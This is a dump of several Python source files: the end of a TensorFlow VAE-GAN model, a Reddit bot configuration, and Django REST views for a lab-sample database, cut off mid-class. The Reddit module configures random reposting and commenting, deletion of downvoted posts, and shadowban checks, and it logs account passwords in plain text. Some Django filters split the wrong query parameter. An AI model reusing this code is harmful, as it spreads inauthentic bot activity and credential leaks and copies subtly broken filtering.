self.encode(x)\n return ds.MultivariateNormalDiag(loc=mu, scale_diag=sigma)\n\n def get_lr_d(self):\n return self.lr_base_disc * self.D_prop\n\n def decode(self, z):\n return self.dec(z)\n\n def discriminate(self, x):\n return self.disc(x)\n\n def reconstruct(self, x):\n mean, _ = self.encode(x)\n return self.decode(mean)\n\n def reparameterize(self, mean, logvar):\n eps = tf.random.normal(shape=mean.shape)\n return eps * tf.exp(logvar * 0.5) + mean\n\n # @tf.function\n def compute_loss(self, x):\n # pass through network\n q_z = self.dist_encode(x)\n z = q_z.sample()\n p_z = ds.MultivariateNormalDiag(\n loc=[0.0] * z.shape[-1], scale_diag=[1.0] * z.shape[-1]\n )\n xg = self.decode(z)\n z_samp = tf.random.normal([x.shape[0], 1, 1, z.shape[-1]])\n xg_samp = self.decode(z_samp)\n d_xg, ld_xg = self.discriminate(xg)\n d_x, ld_x = self.discriminate(x)\n d_xg_samp, ld_xg_samp = self.discriminate(xg_samp)\n\n # GAN losses\n disc_real_loss = gan_loss(logits=d_x, is_real=True)\n disc_fake_loss = gan_loss(logits=d_xg_samp, is_real=False)\n gen_fake_loss = gan_loss(logits=d_xg_samp, is_real=True)\n\n discrim_layer_recon_loss = (\n tf.reduce_mean(tf.reduce_mean(tf.math.square(ld_x - ld_xg), axis=0))\n / self.recon_loss_div\n )\n\n self.D_prop = sigmoid(\n disc_fake_loss - gen_fake_loss, shift=0.0, mult=self.sig_mult\n )\n\n kl_div = ds.kl_divergence(q_z, p_z)\n latent_loss 
= tf.reduce_mean(tf.maximum(kl_div, 0)) / self.latent_loss_div\n\n return (\n self.D_prop,\n latent_loss,\n discrim_layer_recon_loss,\n gen_fake_loss,\n disc_fake_loss,\n disc_real_loss,\n )\n\n # @tf.function\n def compute_gradients(self, x):\n with tf.GradientTape() as enc_tape, tf.GradientTape() as dec_tape, tf.GradientTape() as disc_tape:\n (\n _,\n latent_loss,\n discrim_layer_recon_loss,\n gen_fake_loss,\n disc_fake_loss,\n disc_real_loss,\n ) = self.compute_loss(x)\n\n enc_loss = latent_loss + discrim_layer_recon_loss\n dec_loss = gen_fake_loss + discrim_layer_recon_loss\n disc_loss = disc_fake_loss + disc_real_loss\n\n enc_gradients = enc_tape.gradient(enc_loss, self.enc.trainable_variables)\n dec_gradients = dec_tape.gradient(dec_loss, self.dec.trainable_variables)\n disc_gradients = disc_tape.gradient(disc_loss, self.disc.trainable_variables)\n\n return enc_gradients, dec_gradients, disc_gradients\n\n @tf.function\n def apply_gradients(self, enc_gradients, dec_gradients, disc_gradients):\n self.enc_optimizer.apply_gradients(\n zip(enc_gradients, self.enc.trainable_variables)\n )\n self.dec_optimizer.apply_gradients(\n zip(dec_gradients, self.dec.trainable_variables)\n )\n self.disc_optimizer.apply_gradients(\n zip(disc_gradients, self.disc.trainable_variables)\n )\n\n def train(self, x):\n enc_gradients, dec_gradients, disc_gradients = self.compute_gradients(x)\n self.apply_gradients(enc_gradients, dec_gradients, disc_gradients)\n\n\ndef gan_loss(logits, is_real=True):\n \"\"\"Computes standard gan loss between logits and labels\n \n Arguments:\n logits {[type]} -- output of discriminator\n \n Keyword Arguments:\n isreal {bool} -- whether labels should be 0 (fake) or 1 (real) (default: {True})\n \"\"\"\n if is_real:\n labels = tf.ones_like(logits)\n else:\n labels = tf.zeros_like(logits)\n\n return tf.compat.v1.losses.sigmoid_cross_entropy(\n multi_class_labels=labels, logits=logits\n )\n\n\ndef sigmoid(x, shift=0.0, mult=20):\n \"\"\" squashes a value with a sigmoid\n \"\"\"\n return tf.constant(1.0) / (\n tf.constant(1.0) + tf.exp(-tf.constant(1.0) * (x * mult))\n )\n\n\nclass VAE():\n def __init__(self):\n self.models = self._build()\n self.full_model = self.models[0]\n self.encoder = self.models[1]\n self.decoder = self.models[2]\n\n self.input_dim = INPUT_DIM\n self.z_dim = Z_DIM\n self.learning_rate = LEARNING_RATE\n self.kl_tolerance = KL_TOLERANCE\n\n def _build(self):\n vae_x = Input(shape=INPUT_DIM, name='observation_input')\n vae_c1 = Conv2D(filters = CONV_FILTERS[0], kernel_size = CONV_KERNEL_SIZES[0], strides = CONV_STRIDES[0], activation=CONV_ACTIVATIONS[0], name='conv_layer_1')(vae_x)\n vae_c2 = Conv2D(filters = CONV_FILTERS[1], kernel_size = CONV_KERNEL_SIZES[1], strides = CONV_STRIDES[1], activation=CONV_ACTIVATIONS[0], name='conv_layer_2')(vae_c1)\n vae_c3= Conv2D(filters = CONV_FILTERS[2], kernel_size = CONV_KERNEL_SIZES[2], strides = CONV_STRIDES[2], activation=CONV_ACTIVATIONS[0], name='conv_layer_3')(vae_c2)\n vae_c4= Conv2D(filters = CONV_FILTERS[3], kernel_size = CONV_KERNEL_SIZES[3], strides = CONV_STRIDES[3], activation=CONV_ACTIVATIONS[0], name='conv_layer_4')(vae_c3)\n\n vae_z_in = Flatten()(vae_c4)\n\n vae_z_mean = Dense(Z_DIM, name='mu')(vae_z_in)\n vae_z_log_var = Dense(Z_DIM, name='log_var')(vae_z_in)\n\n vae_z = Sampling(name='z')([vae_z_mean, vae_z_log_var])\n \n\n #### DECODER: \n vae_z_input = Input(shape=(Z_DIM,), name='z_input')\n\n vae_dense = Dense(1024, name='dense_layer')(vae_z_input)\n vae_unflatten = Reshape((1,1,DENSE_SIZE), 
name='unflatten')(vae_dense)\n vae_d1 = Conv2DTranspose(filters = CONV_T_FILTERS[0], kernel_size = CONV_T_KERNEL_SIZES[0] , strides = CONV_T_STRIDES[0], activation=CONV_T_ACTIVATIONS[0], name='deconv_layer_1')(vae_unflatten)\n vae_d2 = Conv2DTranspose(filters = CONV_T_FILTERS[1], kernel_size = CONV_T_KERNEL_SIZES[1] , strides = CONV_T_STRIDES[1], activation=CONV_T_ACTIVATIONS[1], name='deconv_layer_2')(vae_d1)\n vae_d3 = Conv2DTranspose(filters = CONV_T_FILTERS[2], kernel_size = CONV_T_KERNEL_SIZES[2] , strides = CONV_T_STRIDES[2], activation=CONV_T_ACTIVATIONS[2], name='deconv_layer_3')(vae_d2)\n vae_d4 = Conv2DTranspose(filters = CONV_T_FILTERS[3], kernel_size = CONV_T_KERNEL_SIZES[3] , strides = CONV_T_STRIDES[3], activation=CONV_T_ACTIVATIONS[3], name='deconv_layer_4')(vae_d3)\n \n\n #### MODELS\n\n \n vae_encoder = Model(vae_x, [vae_z_mean, vae_z_log_var, vae_z], name = 'encoder')\n vae_decoder = Model(vae_z_input, vae_d4, name = 'decoder')\n\n vae_full = VAEModel(vae_encoder, vae_decoder, 10000)\n\n opti = Adam(lr=LEARNING_RATE)\n vae_full.compile(optimizer=opti)\n \n return (vae_full,vae_encoder, vae_decoder)\n\n def set_weights(self, filepath):\n self.full_model.load_weights(filepath)\n\n def train(self, data):\n\n self.full_model.fit(data, data,\n shuffle=True,\n epochs=1,\n batch_size=BATCH_SIZE)\n \n def save_weights(self, filepath):\n self.full_model.save_weights(filepath)\n"} {"ext": "py", "sha": "1a2fb744396bccd3b48b313776264cdfe8dd0a7c", "content": "from utils import prefer_envar\nfrom logs.logger import log\nfrom logs.log_utils import log_json\nfrom config.reddit.reddit_sub_lists import REDDIT_APPROVED_SUBS\nfrom config.reddit.config_gen import config_gen\nimport sys\nimport json\nimport os\n\nif os.path.isfile('config.json'):\n file = open(\"config.json\", \"r\")\n AUTH = prefer_envar(json.loads(file.read()))\nelse:\n AUTH = prefer_envar({\n # app creds\n \"reddit_client_id\":\"\",\n \"reddit_client_secret\":\"\",\n # reddit account creds\n \"reddit_username\":\"\",\n \"reddit_password\":\"\",\n })\n\nfor envar in AUTH:\n if AUTH[envar] == \"\":\n # reddit auth not configured correctly. \n # instruct user to generate a .env file\n config_gen()\n\nlog.info(f\"REDDIT AUTH CONFIG:\\n {log_json(AUTH)}\")\n\nCONFIG = prefer_envar({\n \"reddit_crosspost_enabled\": False,\n # the chance the bot will repost a post\n \"reddit_post_chance\": 0.005,\n # the chance the bot will make a comment\n \"reddit_comment_chance\": 0.005,\n # the chance the bot will reply to a comment\n # otherwise it will reply to a post\n \"reddit_reply_to_comment\": 0.002,\n # chance the bot will remove poor performing\n # posts and comments\n \"reddit_remove_low_scores\": 0.002,\n # posts/comments that get downvoted to this score will be deleted\n \"reddit_low_score_threshold\": 0,\n # chance to check if the bot is shadowbanned, \n # and shut down the script automatically\n \"reddit_shadowban_check\": 0.002,\n # list of subreddits for the bot to use\n \"reddit_sub_list\": REDDIT_APPROVED_SUBS,\n # bot schedules. 
all times are UTC\n # add the schedule number to the array\n # and the bot will run within that time range\n # leave the array empty for no schedule: []\n # 1 - 7am-10am ((7,00),(10,00))\n # 2 - 10am-2pm ((10,00),(14,00))\n # 3 - 2pm-6pm ((14,00),(18,00))\n # 4 - 6pm-10pm ((18,00),(22,00))\n # 5 - 10pm-2am ((22,00),(2,00))\n \"reddit_sleep_schedule\": [2, 4]\n})\n\nlog.info(f\"REDDIT CONNFIG:\\n {log_json(CONFIG)}\")\n"} {"ext": "py", "sha": "1a2fba1a886ca8bda4185af80c3157d5a5d9f4a5", "content": "from django.http import JsonResponse\nfrom django.utils import timezone\nfrom django.contrib.sessions.models import Session\nfrom rest_framework import views, viewsets, authentication\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.exceptions import APIException\nfrom liliapi.serializers import *\nfrom liliapi.models import *\nfrom liliapi.permissions import *\nfrom liliapi.paginations import *\nfrom liliapi.authentication import *\nfrom liliapi.tasks import *\n\n\n########################################################################################################################\n#\n# copyright: 2017 WiM - USGS\n# authors: Aaron Stephenson USGS WiM (Web Informatics and Mapping)\n#\n# In Django, a view is what takes a Web request and returns a Web response. The response can be many things, but most\n# of the time it will be a Web page, a redirect, or a document. In this case, the response will almost always be data\n# in JSON format.\n#\n# All these views are written as Class-Based Views (https://docs.djangoproject.com/en/1.11/topics/class-based-views/)\n# because that is the paradigm used by Django Rest Framework (http://www.django-rest-framework.org/api-guide/views/)\n# which is the toolkit we used to create web services in Django.\n#\n#\n########################################################################################################################\n\n\nLIST_DELIMETER = settings.LIST_DELIMETER\n\n\n######\n#\n# Abstract Base Classes\n#\n######\n\n\nclass HistoryViewSet(viewsets.ModelViewSet):\n \"\"\"\n This class will automatically assign the User ID to the created_by and modified_by history fields when appropriate\n \"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n pagination_class = StandardResultsSetPagination\n\n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user, modified_by=self.request.user)\n\n def perform_update(self, serializer):\n serializer.save(modified_by=self.request.user)\n\n # override the default pagination to allow disabling of pagination\n def paginate_queryset(self, *args, **kwargs):\n if self.request and 'paginate' in self.request.query_params:\n return super().paginate_queryset(*args, **kwargs)\n return None\n\n######\n#\n# Samples\n#\n######\n\n\nclass SampleViewSet(HistoryViewSet):\n serializer_class = SampleSerializer\n\n def get_serializer_class(self):\n if self.request and 'slim' in self.request.query_params:\n return SampleSlimSerializer\n else:\n return SampleSerializer\n\n @action(detail=False)\n def finalsamplemeanconcentrations(self, request):\n queryset = Sample.objects.prefetch_related('finalsamplemeanconcentrations').distinct()\n query_params = self.request.query_params\n # filter by sample IDs, exact list\n sample = query_params.get('sample', None)\n if sample is not None:\n if LIST_DELIMETER in sample:\n sample_list = sample.split(LIST_DELIMETER)\n queryset = 
queryset.filter(id__in=sample_list)\n else:\n queryset = queryset.filter(id__exact=sample)\n # filter by target IDs, exact list\n target = query_params.get('target', None)\n target_list = []\n if target is not None:\n if LIST_DELIMETER in target:\n target_list = target.split(LIST_DELIMETER)\n queryset = queryset.filter(finalsamplemeanconcentrations__target__in=target_list)\n else:\n target_list = [target]\n queryset = queryset.filter(finalsamplemeanconcentrations__target__exact=target)\n\n # recalc reps validity\n for sample in queryset:\n fsmcs = FinalSampleMeanConcentration.objects.filter(sample=sample.id, target__in=target_list)\n for fsmc in fsmcs:\n recalc_reps('FinalSampleMeanConcentration', sample.id, target=fsmc.target.id, recalc_rep_conc=False)\n\n # start building up the response object\n resp = []\n for sample in queryset:\n sample_target_list = [int(target) for target in target_list]\n item = {\n \"id\": sample.id,\n \"collaborator_sample_id\": sample.collaborator_sample_id,\n \"collection_start_date\": sample.collection_start_date,\n \"final_sample_mean_concentrations\": []\n }\n fsmcs = list(FinalSampleMeanConcentration.objects.filter(sample=sample.id))\n for fsmc in fsmcs:\n # attempt to find the matching target in the fsmc list\n try:\n sample_target_index = sample_target_list.index(fsmc.target.id)\n # pop the matching fsmc target from its list so that we eventually end up with an empty list,\n # or a list of extraneous targets\n sample_target_list.pop(sample_target_index)\n\n # start building up the nested response object\n item[\"final_sample_mean_concentrations\"].append({\n \"target\": fsmc.target.id,\n \"target_string\": fsmc.target.name,\n \"final_sample_mean_concentration\": fsmc.final_sample_mean_concentration\n })\n # no matching target was found in the fsmc list\n except ValueError:\n # do not include this fsmc in the response because its target was not requested\n continue\n # now list out the other targets that were requested but do not exist for this sample\n for extraneous_target in sample_target_list:\n # start building up the nested response object\n target_name = list(Target.objects.filter(id=extraneous_target).values_list('name', flat=True))\n item[\"final_sample_mean_concentrations\"].append({\n \"target\": extraneous_target,\n \"target_string\": target_name[0],\n \"final_sample_mean_concentration\": \"N/A\"\n })\n resp.append(item)\n\n return Response(resp)\n\n @action(detail=False)\n def get_count(self, request):\n # Sample.objects.filter(matrix__in=matrix_list).count()\n query_params = self.request.query_params\n return Response({\"count\": self.build_queryset(query_params).count()})\n\n @action(detail=False)\n def get_sampler_names(self, request):\n sampler_names = set(list(Sample.objects.values_list('sampler_name', flat=True)))\n return Response({\"sampler_names\": sampler_names})\n\n @action(detail=False)\n def get_recent_pegnegs(self, request):\n pegneg_record_type = RecordType.objects.filter(id=2).first()\n recent_pegnegs = Sample.objects.filter(record_type=pegneg_record_type).order_by('-id')[:20]\n return Response(self.serializer_class(recent_pegnegs, many=True).data)\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n query_params = self.request.query_params\n return self.build_queryset(query_params)\n\n # build a queryset using query_params\n # NOTE: this is being done in its own method to adhere to the DRY Principle\n def build_queryset(self, query_params):\n queryset = Sample.objects.all()\n # 
filter by sample IDs, exact list\n sample = query_params.get('id', None)\n if sample is not None:\n if LIST_DELIMETER in sample:\n sample_list = sample.split(LIST_DELIMETER)\n queryset = queryset.filter(id__in=sample_list)\n else:\n queryset = queryset.filter(id__exact=sample)\n # filter by sample ID, range\n from_sample = query_params.get('from_id', None)\n to_sample = query_params.get('to_id', None)\n if from_sample is not None and to_sample is not None:\n # the filter below using __range is value-inclusive\n queryset = queryset.filter(id__range=(from_sample, to_sample))\n elif to_sample is not None:\n queryset = queryset.filter(id__lte=to_sample)\n elif from_sample is not None:\n queryset = queryset.filter(id__gte=from_sample)\n # filter by study ID, exact list\n study = query_params.get('study', None)\n if study is not None:\n if LIST_DELIMETER in study:\n study_list = study.split(LIST_DELIMETER)\n queryset = queryset.filter(study__in=study_list)\n else:\n queryset = queryset.filter(study__exact=study)\n # filter by collection_start_date, range\n from_collection_start_date = query_params.get('from_collection_start_date', None)\n to_collection_start_date = query_params.get('to_collection_start_date', None)\n if from_collection_start_date is not None and to_collection_start_date is not None:\n # the filter below using __range is value-inclusive\n queryset = queryset.filter(collection_start_date__range=(\n from_collection_start_date, to_collection_start_date))\n elif to_collection_start_date is not None:\n queryset = queryset.filter(collection_start_date__lte=to_collection_start_date)\n elif from_collection_start_date is not None:\n queryset = queryset.filter(collection_start_date__gte=from_collection_start_date)\n # filter by collaborator_sample_id, exact list\n collaborator_sample_id = query_params.get('collaborator_sample_id', None)\n if collaborator_sample_id is not None:\n if LIST_DELIMETER in collaborator_sample_id:\n collaborator_sample_id_list = collaborator_sample_id.split(LIST_DELIMETER)\n queryset = queryset.filter(collaborator_sample_id__in=collaborator_sample_id_list)\n else:\n queryset = queryset.filter(collaborator_sample_id__exact=collaborator_sample_id)\n # filter by sample type, exact list\n sample_type = query_params.get('sample_type', None)\n if sample_type is not None:\n if LIST_DELIMETER in sample_type:\n sample_type_list = sample_type.split(LIST_DELIMETER)\n queryset = queryset.filter(sample_type__in=sample_type_list)\n else:\n queryset = queryset.filter(sample_type__exact=sample_type)\n # filter by matrix, exact list\n matrix = query_params.get('matrix', None)\n if matrix is not None:\n if LIST_DELIMETER in matrix:\n matrix_list = matrix.split(LIST_DELIMETER)\n queryset = queryset.filter(matrix__in=matrix_list)\n else:\n queryset = queryset.filter(matrix__exact=matrix)\n # filter by record_type, exact list\n record_type = query_params.get('record_type', None)\n if record_type is not None:\n if LIST_DELIMETER in record_type:\n record_type_list = record_type.split(LIST_DELIMETER)\n queryset = queryset.filter(record_type__in=record_type_list)\n else:\n queryset = queryset.filter(record_type__exact=record_type)\n # filter by peg_neg, exact list\n peg_neg = query_params.get('peg_neg', None)\n if peg_neg is not None:\n if LIST_DELIMETER in peg_neg:\n peg_neg_list = peg_neg.split(LIST_DELIMETER)\n queryset = queryset.filter(peg_neg__in=peg_neg_list)\n else:\n queryset = queryset.filter(peg_neg__exact=peg_neg)\n return queryset\n\n\nclass AliquotViewSet(HistoryViewSet):\n 
queryset = Aliquot.objects.all()\n serializer_class = AliquotCustomSerializer\n\n @action(detail=False)\n def get_location(self, request):\n # get the freezer from the request query\n freezer = request.query_params.get('freezer', None)\n # get the rack from the request query\n rack = request.query_params.get('rack', None)\n # get the box from the request query\n box = request.query_params.get('box', None)\n\n # if a freezer was included in the query, use it, otherwise default to the first freezer\n freezer = freezer if freezer else 1\n\n # find all aliquots in the requested rack and/or box (and freezer)\n if rack and box:\n queryset = Aliquot.objects.filter(freezer_location__freezer=freezer,\n freezer_location__rack=rack, freezer_location__box=box)\n elif rack:\n queryset = Aliquot.objects.filter(freezer_location__freezer=freezer, freezer_location__rack=rack)\n elif box:\n queryset = Aliquot.objects.filter(freezer_location__freezer=freezer, freezer_location__box=box)\n else:\n queryset = Aliquot.objects.none()\n\n return Response(AliquotSlimSerializer(queryset, many=True).data)\n\n @action(methods=['post'], detail=False)\n def bulk_delete(self, request):\n # ensure submitted data is a list of only IDs or a list of only aliquot_strings (SampleID-AliquotNumber)\n if all([str(item).isdigit() for item in request.data]):\n aliquots = Aliquot.objects.filter(id__in=request.data)\n if len(aliquots) != len(request.data):\n aliquot_ids = [aliquot.id for aliquot in aliquots]\n invalid_ids = list(set(request.data).difference(aliquot_ids))\n message = \"Invalid request. No aliquots deleted. The following submitted values could not be found\"\n message += \" in the database: \" + str(invalid_ids)\n return JsonResponse({\"message\": message}, status=400)\n else:\n freezer_location_ids = [aliquot.freezer_location_id for aliquot in aliquots]\n Aliquot.objects.filter(id__in=request.data).delete()\n FreezerLocation.objects.filter(id__in=freezer_location_ids).delete()\n return JsonResponse({\"message\": \"Aliquots deleted.\"}, status=200)\n elif all([isinstance(item, str) and '-' in item for item in request.data]):\n aliquot_ids = []\n freezer_location_ids = []\n invalid_ids = []\n for item in request.data:\n item_split = item.split('-')\n aliquot = Aliquot.objects.filter(sample=item_split[0], aliquot_number=item_split[1]).first()\n if aliquot:\n aliquot_ids.append(aliquot.id)\n freezer_location_ids.append(aliquot.freezer_location_id)\n else:\n invalid_ids.append(item)\n if len(invalid_ids) > 0:\n message = \"Invalid request. No aliquots deleted. The following submitted values could not be found\"\n message += \" in the database: \" + str(invalid_ids)\n return JsonResponse({\"message\": message}, status=400)\n else:\n Aliquot.objects.filter(id__in=aliquot_ids).delete()\n FreezerLocation.objects.filter(id__in=freezer_location_ids).delete()\n return JsonResponse({\"message\": \"Aliquots deleted.\"}, status=200)\n else:\n message = \"Invalid request. 
Submitted data must be a list/array of aliquot IDs\"\n message += \"or sample_id-aliquot_number combinations (e.g., '1001-3')\"\n return JsonResponse({\"message\": message}, status=400)\n\n def get_serializer_class(self):\n if not isinstance(self.request.data, list):\n return AliquotSerializer\n else:\n return self.serializer_class\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list) and len(data) > 0 and 'aliquot_count' in data[0]:\n kwargs['many'] = True\n\n return super(AliquotViewSet, self).get_serializer(*args, **kwargs)\n\n\nclass SampleTypeViewSet(HistoryViewSet):\n queryset = SampleType.objects.all()\n serializer_class = SampleTypeSerializer\n\n\nclass MatrixViewSet(HistoryViewSet):\n queryset = Matrix.objects.all()\n serializer_class = MatrixSerializer\n\n\nclass FilterTypeViewSet(HistoryViewSet):\n queryset = FilterType.objects.all()\n serializer_class = FilterTypeSerializer\n\n\nclass StudyViewSet(HistoryViewSet):\n queryset = Study.objects.all()\n serializer_class = StudySerializer\n\n\nclass UnitViewSet(HistoryViewSet):\n queryset = Unit.objects.all()\n serializer_class = UnitSerializer\n\n\n######\n#\n# Freezer Locations\n#\n######\n\n\nclass FreezerLocationViewSet(HistoryViewSet):\n queryset = FreezerLocation.objects.all()\n serializer_class = FreezerLocationSerializer\n\n @action(methods=['get'], detail=False)\n def get_next_available(self, request):\n # get the first empty box in the any freezer\n first_empty_box = FreezerLocation.objects.get_first_empty_box()\n if first_empty_box is None:\n first_empty_box = \"There are no more empty boxes in this freezer!\"\n # get the study_id from the request query\n study_id = request.query_params.get('study', None)\n last_spot = FreezerLocation.objects.get_last_occupied_spot(study_id)\n # if a last spot is found look up the next available spot\n if last_spot is not None:\n next_spot = FreezerLocation.objects.get_next_available_spot(last_spot)\n # if there is a next spot\n if next_spot is not None:\n # start building the full response object\n resp = next_spot\n\n # determine maximum available spots in a box in this freezer (for an empty box)\n rows_in_box = last_spot.freezer.rows\n spots_in_row = last_spot.freezer.spots\n spots_in_box = rows_in_box * spots_in_row\n\n # ensure next spot and next empty box are not the same\n get_second_empty_box = True if next_spot['available_spots_in_box'] == spots_in_box else False\n next_empty_box = FreezerLocation.objects.get_next_empty_box(last_spot, get_second_empty_box)\n\n # then add the next empty box to the response object\n resp.update({\"next_empty_box\": next_empty_box})\n # no next spot was found\n else:\n resp = {\"not_found\": \"There are no more empty boxes in this freezer!\"}\n # otherwise no last spot has been found\n else:\n # if a study_id was included in the query, mention it in the response\n if study_id is not None:\n study = Study.objects.filter(id=study_id).first()\n message = \"No aliquots for \"\n if study is not None:\n message += study.name + \" \"\n message += \"(Study ID #\" + str(study_id) + \") are stored in any freezer.\"\n # otherwise inform the user that no freezer locations have been used\n else:\n message = \"No aliquots are stored in any freezer.\"\n resp = {\"not_found\": message}\n resp.update({\"next_empty_box\": first_empty_box})\n return Response(resp)\n\n\nclass FreezerViewSet(HistoryViewSet):\n queryset = Freezer.objects.all()\n serializer_class = 
FreezerSerializer\n\n\n######\n#\n# Final Sample Values\n#\n######\n\n\nclass FinalConcentratedSampleVolumeViewSet(HistoryViewSet):\n serializer_class = FinalConcentratedSampleVolumeSerializer\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n queryset = FinalConcentratedSampleVolume.objects.all()\n # filter by sample ID, exact list\n sample = self.request.query_params.get('sample', None)\n if sample is not None:\n sample_list = sample.split(',')\n queryset = queryset.filter(sample__in=sample_list)\n return queryset\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(FinalConcentratedSampleVolumeViewSet, self).get_serializer(*args, **kwargs)\n\n\nclass ConcentrationTypeViewSet(HistoryViewSet):\n queryset = ConcentrationType.objects.all()\n serializer_class = ConcentrationTypeSerializer\n\n\nclass FinalSampleMeanConcentrationViewSet(HistoryViewSet):\n serializer_class = FinalSampleMeanConcentrationSerializer\n\n @action(detail=False)\n def summary_statistics(self, request):\n sample = request.query_params.get('sample', None)\n target = request.query_params.get('target', None)\n statistic = request.query_params.get('statistic', None)\n report_type = ReportType.objects.filter(id=2).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_results_summary_report.delay(sample, target, statistic, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Results Summary Report received.\"}, status=200)\n\n @action(detail=False)\n def results(self, request):\n sample = request.query_params.get('sample', None)\n target = request.query_params.get('target', None)\n report_type = ReportType.objects.filter(id=3).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_individual_sample_report.delay(sample, target, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Individual Sample Report received.\"}, status=200)\n\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n query_params = self.request.query_params\n return self.build_queryset(query_params)\n\n # build a queryset using query_params\n # NOTE: this is being done in its own method to adhere to the DRY Principle\n def build_queryset(self, query_params):\n queryset = FinalSampleMeanConcentration.objects.all()\n # filter by sample ID, exact list\n sample = query_params.get('sample', None)\n if sample is not None:\n sample_list = sample.split(',')\n queryset = queryset.filter(sample__in=sample_list)\n # filter by target ID, exact list\n target = query_params.get('target', None)\n if target is not None:\n target_list = target.split(',')\n queryset = queryset.filter(target__in=target_list)\n # filter by study ID, exact list\n study = query_params.get('study', None)\n if study is not None:\n study_list = sample.split(',')\n queryset = 
queryset.filter(sample__study__in=study_list)\n # filter by collection_start_date, exact list\n collection_start_date = query_params.get('collection_start_date', None)\n if collection_start_date is not None:\n collection_start_date_list = sample.split(',')\n queryset = queryset.filter(sample__collection_start_date__in=collection_start_date_list)\n # filter by collaborator_sample_id, exact list\n collaborator_sample_id = query_params.get('collaborator_sample_id', None)\n if collaborator_sample_id is not None:\n collaborator_sample_id_list = sample.split(',')\n queryset = queryset.filter(sample__collaborator_sample_id__in=collaborator_sample_id_list)\n\n # recalc reps validity\n for fsmc in queryset:\n recalc_reps('FinalSampleMeanConcentration', fsmc.sample.id, target=fsmc.target.id, recalc_rep_conc=False)\n\n return queryset\n\n # override the default GET method to recalc all child PCR Replicates first before the FSMC Select query\n def retrieve(self, request, *args, **kwargs):\n recalc_reps('FinalSampleMeanConcentration',\n self.get_object().sample.id, target=self.get_object().target.id, recalc_rep_conc=False)\n return super(FinalSampleMeanConcentrationViewSet, self).retrieve(request, *args, **kwargs)\n\n\n######\n#\n# Sample Groups\n#\n######\n\n\nclass SampleSampleGroupViewSet(HistoryViewSet):\n queryset = SampleSampleGroup.objects.all()\n serializer_class = SampleSampleGroupSerializer\n\n\nclass SampleGroupViewSet(HistoryViewSet):\n queryset = SampleGroup.objects.all()\n serializer_class = SampleGroupSerializer\n\n\n######\n#\n# Analyses\n#\n######\n\n\nclass SampleAnalysisBatchViewSet(HistoryViewSet):\n queryset = SampleAnalysisBatch.objects.all()\n serializer_class = SampleAnalysisBatchSerializer\n\n\nclass AnalysisBatchViewSet(HistoryViewSet):\n queryset = AnalysisBatch.objects.all()\n serializer_class = AnalysisBatchSerializer\n\n # override the default DELETE method to prevent deletion of an AnalysisBatch with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch__extraction_batch__analysis_batch=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"An Analysis Batch may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(AnalysisBatchViewSet, self).destroy(request, *args, **kwargs)\n\n\nclass AnalysisBatchDetailViewSet(HistoryViewSet):\n serializer_class = AnalysisBatchDetailSerializer\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n queryset = AnalysisBatch.objects.all()\n batch = self.request.query_params.get('id', None)\n if batch is not None:\n if LIST_DELIMETER in batch:\n batch_list = batch.split(',')\n queryset = queryset.filter(id__in=batch_list)\n else:\n queryset = queryset.filter(id__exact=batch)\n return queryset\n\n\nclass AnalysisBatchSummaryViewSet(HistoryViewSet):\n serializer_class = AnalysisBatchSummarySerializer\n\n @action(detail=False)\n def get_count(self, request):\n query_params = self.request.query_params\n return Response({\"count\": self.build_queryset(query_params).count()})\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n query_params = self.request.query_params\n return self.build_queryset(query_params)\n\n # build a queryset using query_params\n # NOTE: this is being done in its own method to adhere to the DRY Principle\n def build_queryset(self, 
query_params):\n study = self.request.query_params.get('study', None)\n if study is not None:\n queryset = AnalysisBatch.objects.prefetch_related('samples').all()\n else:\n queryset = AnalysisBatch.objects.all()\n # filter by batch ID, exact list\n batch = self.request.query_params.get('id', None)\n if batch is not None:\n if LIST_DELIMETER in batch:\n batch_list = batch.split(',')\n queryset = queryset.filter(id__in=batch_list)\n else:\n queryset = queryset.filter(id__exact=batch)\n # filter by batch ID, range\n from_batch = query_params.get('from_id', None)\n to_batch = query_params.get('to_id', None)\n if from_batch is not None and to_batch is not None:\n # the filter below using __range is value-inclusive\n queryset = queryset.filter(id__range=(from_batch, to_batch))\n elif to_batch is not None:\n queryset = queryset.filter(id__lte=to_batch)\n elif from_batch is not None:\n queryset = queryset.filter(id__gte=from_batch)\n # filter by study ID, exact list\n if study is not None:\n if LIST_DELIMETER in study:\n study_list = study.split(',')\n queryset = queryset.filter(samples__study__in=study_list).distinct()\n else:\n queryset = queryset.filter(samples__study__exact=study).distinct()\n return queryset\n\n\nclass AnalysisBatchTemplateViewSet(HistoryViewSet):\n queryset = AnalysisBatchTemplate.objects.all()\n serializer_class = AnalysisBatchTemplateSerializer\n\n\n######\n#\n# Extractions\n#\n######\n\n\nclass ExtractionMethodViewSet(HistoryViewSet):\n queryset = ExtractionMethod.objects.all()\n serializer_class = ExtractionMethodSerializer\n\n\nclass 